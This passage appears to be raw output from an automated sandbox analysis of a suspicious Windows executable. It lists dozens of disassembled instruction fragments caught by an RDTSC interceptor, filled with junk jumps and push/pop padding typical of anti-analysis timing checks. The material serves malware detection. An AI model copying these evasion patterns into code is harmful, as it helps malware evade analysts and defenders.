                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12419 second address: C12439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEB1CC19F87h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12725 second address: C1272A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12E55 second address: C12E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12E59 second address: C12E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C11395 second address: C11399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C11399 second address: C113BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FEB1C7EA9DCh 0x0000000f jnp 00007FEB1C7EA9D6h 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C113BD second address: C113CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEB1CC19F76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C113CC second address: C113D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C113D0 second address: C113ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007FEB1CC19F76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C1AA60 second address: C1AA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C1A78E second address: C1A798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEB1CC19F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C1A798 second address: C1A7DB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEB1C7EA9D6h 0x00000008 jmp 00007FEB1C7EA9E4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FEB1C7EA9DFh 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jp 00007FEB1C7EA9D6h 0x0000001d jmp 00007FEB1C7EA9DBh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C289CD second address: C289F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEB1CC19F76h 0x0000000a jmp 00007FEB1CC19F88h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C2AC1A second address: C2AC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C2AC1E second address: C2AC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FEB1CC19F7Ch 0x0000000e pop edi 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jno 00007FEB1CC19F76h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3448B second address: C34495 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C34495 second address: C344A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEB1CC19F76h 0x0000000a jo 00007FEB1CC19F76h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C344A5 second address: C344A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C344A9 second address: C344FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1CC19F81h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEB1CC19F7Dh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEB1CC19F82h 0x00000019 pushad 0x0000001a jmp 00007FEB1CC19F83h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C344FB second address: C34501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C34501 second address: C34506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C34506 second address: C3450E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3450E second address: C34512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3BDD1 second address: C3BE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jp 00007FEB1C7EA9D6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FEB1C7EA9E7h 0x00000015 jnc 00007FEB1C7EA9D6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jnp 00007FEB1C7EA9D6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3BE0D second address: C3BE21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3F2B3 second address: C3F2DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jbe 00007FEB1C7EA9FEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FEB1C7EA9E2h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3F2DA second address: C3F2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C45C4F second address: C45C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 jmp 00007FEB1C7EA9E0h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jmp 00007FEB1C7EA9E6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007FEB1C7EA9E4h 0x0000001c popad 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C443AF second address: C443D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEB1CC19F7Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C443D7 second address: C443F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007FEB1C7EA9D6h 0x0000000d jmp 00007FEB1C7EA9DCh 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C443F4 second address: C44423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jmp 00007FEB1CC19F89h 0x00000013 jns 00007FEB1CC19F76h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44582 second address: C44586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44860 second address: C4486D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jnp 00007FEB1CC19F76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C4486D second address: C44891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FEB1C7EA9E6h 0x0000000b jno 00007FEB1C7EA9D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B41 second address: C44B47 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B47 second address: C44B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B53 second address: C44B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B57 second address: C44B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b js 00007FEB1C7EA9D6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FEB1C7EA9E4h 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B85 second address: C44B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B95 second address: C44BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEB1C7EA9E7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44E54 second address: C44E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C48FB3 second address: C48FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C490E4 second address: C490F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C490F0 second address: C490FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C490FA second address: C49103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C49103 second address: C4912A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEB1C7EA9E9h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C5ABB5 second address: C5ABC6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1CC19F7Ch 0x00000008 je 00007FEB1CC19F76h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C53B69 second address: C53B71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C53B71 second address: C53B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C53B76 second address: C53BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9E3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FEB1C7EAA0Ah 0x00000012 pushad 0x00000013 jmp 00007FEB1C7EA9E6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnp 00007FEB1C7EA9D6h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C53BBC second address: C53BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C6A3D4 second address: C6A3F7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FEB1C7EA9E9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C6A3F7 second address: C6A41B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEB1CC19F8Ah 0x00000008 jmp 00007FEB1CC19F84h 0x0000000d jbe 00007FEB1CC19F82h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C80C5C second address: C80C71 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEB1C7EA9DEh 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C7FB45 second address: C7FB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C7FF6E second address: C7FF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEB1C7EA9E5h 0x0000000b popad 0x0000000c jl 00007FEB1C7EA9DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C800D7 second address: C80104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 je 00007FEB1CC19F76h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEB1CC19F87h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C80104 second address: C80108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C8365C second address: C83660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C83B5B second address: C83C23 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEB1C7EA9E4h 0x00000008 jmp 00007FEB1C7EA9DEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 call 00007FEB1C7EA9DEh 0x00000015 mov edx, dword ptr [ebp+122D3588h] 0x0000001b pop edx 0x0000001c mov dx, 512Ch 0x00000020 push dword ptr [ebp+1244BD7Dh] 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FEB1C7EA9D8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D3119h], edi 0x00000046 call 00007FEB1C7EA9D9h 0x0000004b jg 00007FEB1C7EA9DAh 0x00000051 push eax 0x00000052 jng 00007FEB1C7EA9EFh 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b jmp 00007FEB1C7EA9E5h 0x00000060 popad 0x00000061 mov eax, dword ptr [esp+04h] 0x00000065 jmp 00007FEB1C7EA9E1h 0x0000006a mov eax, dword ptr [eax] 0x0000006c jmp 00007FEB1C7EA9E6h 0x00000071 mov dword ptr [esp+04h], eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C83C23 second address: C83C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C83C27 second address: C83C31 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C84DD0 second address: C84E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FEB1CC19F76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c js 00007FEB1CC19F87h 0x00000012 jmp 00007FEB1CC19F81h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c jbe 00007FEB1CC19F76h 0x00000022 je 00007FEB1CC19F76h 0x00000028 pop eax 0x00000029 push esi 0x0000002a jg 00007FEB1CC19F76h 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C86B3E second address: C86B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA13B7 second address: BA13CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007FEB1CC19F82h 0x0000000e js 00007FEB1CC19F7Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0787 second address: 4DF078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF078D second address: 4DF0791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0791 second address: 4DF07D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FEB1C7EA9DEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FEB1C7EA9DDh 0x0000001c jmp 00007FEB1C7EA9DBh 0x00000021 popfd 0x00000022 mov ecx, 536CC86Fh 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF07D8 second address: 4DF07E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF07E0 second address: 4DF0860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 jmp 00007FEB1C7EA9E8h 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FEB1C7EA9E1h 0x00000015 jmp 00007FEB1C7EA9DBh 0x0000001a popfd 0x0000001b mov di, cx 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FEB1C7EA9E7h 0x00000029 or ah, 0000006Eh 0x0000002c jmp 00007FEB1C7EA9E9h 0x00000031 popfd 0x00000032 mov ah, D8h 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0860 second address: 4DF0874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, EFEFh 0x00000007 mov bx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx esi, di 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0874 second address: 4DF08B5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1C7EA9DFh 0x00000008 sbb ecx, 13E3B22Eh 0x0000000e jmp 00007FEB1C7EA9E9h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx esi, dx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c movzx ecx, dx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF08B5 second address: 4DF08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF08B9 second address: 4DF0924 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 3E54h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a jmp 00007FEB1C7EA9E3h 0x0000000f lea eax, dword ptr [ebp-04h] 0x00000012 jmp 00007FEB1C7EA9E6h 0x00000017 nop 0x00000018 jmp 00007FEB1C7EA9E0h 0x0000001d push eax 0x0000001e jmp 00007FEB1C7EA9DBh 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FEB1C7EA9E5h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0A4B second address: 4DF0A73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEB1CC19F85h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0A73 second address: 4DF0A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0A78 second address: 4DE000A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FEB1CC19F82h 0x00000012 adc ax, 4F58h 0x00000017 jmp 00007FEB1CC19F7Bh 0x0000001c popfd 0x0000001d movzx esi, bx 0x00000020 popad 0x00000021 leave 0x00000022 pushad 0x00000023 mov cx, bx 0x00000026 mov ebx, 5AE656A0h 0x0000002b popad 0x0000002c retn 0004h 0x0000002f nop 0x00000030 sub esp, 04h 0x00000033 xor ebx, ebx 0x00000035 cmp eax, 00000000h 0x00000038 je 00007FEB1CC1A0DAh 0x0000003e mov dword ptr [esp], 0000000Dh 0x00000045 call 00007FEB21026111h 0x0000004a mov edi, edi 0x0000004c push eax 0x0000004d push edx 0x0000004e 